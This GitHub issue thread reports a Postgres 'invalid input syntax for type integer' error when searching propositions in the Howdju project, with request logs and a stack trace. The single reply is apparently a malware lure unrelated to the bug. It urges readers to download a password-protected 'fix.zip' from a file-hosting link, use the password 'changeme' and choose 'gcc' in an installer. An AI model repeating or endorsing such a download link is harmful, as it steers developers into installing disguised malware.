### ISSUE TITLE
DB error searching propositions `invalid input syntax for type integer`

### ISSUE THREAD

**Issue by carlgieringer** [Howdju/howdju#721]
```
    "message": "Query readUserBlurbsForIds failed: error: invalid input syntax for type integer: \"\""
```    

```
            "queryStringParameters": {
                "searchText": "Test proposition 123"
            },
            "multiValueQueryStringParameters": {
                "searchText": [
                    "Test proposition 123"
                ]
            },
            "pathParameters": {
                "proxy": "search-propositions"
            },
            "stageVariables": {
                "logLevel": "silly",
                "lambdaAlias": "pre-prod"
            },
            "requestContext": {
                "resourceId": "2u581q",
                "resourcePath": "/api/{proxy+}",
                "httpMethod": "GET",
                "extendedRequestId": "dHxtaEx5IAMECHg=",
                "requestTime": "26/Aug/2024:14:51:01 +0000",
                "path": "/api/search-propositions",
```

```
{
    "timestamp": "2024-08-26T14:51:01.635Z",
    "context": {
        "clientRequestId": "e2eaf6ac-5e64-4f54-a666-b4cd75de8f63",
        "serverRequestId": "94d27423-bf86-4ae3-beaf-0b0d14c6e8b7",
        "stage": "pre_prod"
    },
    "level": "error",
    "levelNumber": 0,
    "message": "Unexpected error",
    "data": {
        "err": {
            "stack": "error: invalid input syntax for type integer: \"\"\n    at Parser.parseErrorMessage (/node_modules/pg-protocol/src/parser.ts:369:69)\n    at Parser.handlePacket (/node_modules/pg-protocol/src/parser.ts:188:21)\n    at Parser.parse (/node_modules/pg-protocol/src/parser.ts:103:30)\n    at Socket.<anonymous> (/node_modules/pg-protocol/src/index.ts:7:48)\n    at Socket.emit (node:events:517:28)\n    at Socket.emit (node:domain:489:12)\n    at addChunk (node:internal/streams/readable:368:12)\n    at readableAddChunk (node:internal/streams/readable:341:9)\n    at Socket.Readable.push (node:internal/streams/readable:278:10)\n    at TCP.onStreamRead (node:internal/stream_base_commons:190:23)",
            "message": "invalid input syntax for type integer: \"\"",
            "length": 101,
            "name": "error",
            "severity": "ERROR",
            "code": "22P02",
            "file": "numutils.c",
            "line": "259",
            "routine": "pg_strtoint32"
        },
        "stack": "error: invalid input syntax for type integer: \"\"\n    at Parser.parseErrorMessage (/node_modules/pg-protocol/src/parser.ts:369:69)\n    at Parser.handlePacket (/node_modules/pg-protocol/src/parser.ts:188:21)\n    at Parser.parse (/node_modules/pg-protocol/src/parser.ts:103:30)\n    at Socket.<anonymous> (/node_modules/pg-protocol/src/index.ts:7:48)\n    at Socket.emit (node:events:517:28)\n    at Socket.emit (node:domain:489:12)\n    at addChunk (node:internal/streams/readable:368:12)\n    at readableAddChunk (node:internal/streams/readable:341:9)\n    at Socket.Readable.push (node:internal/streams/readable:278:10)\n    at TCP.onStreamRead (node:internal/stream_base_commons:190:23)"
    }
}
```

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
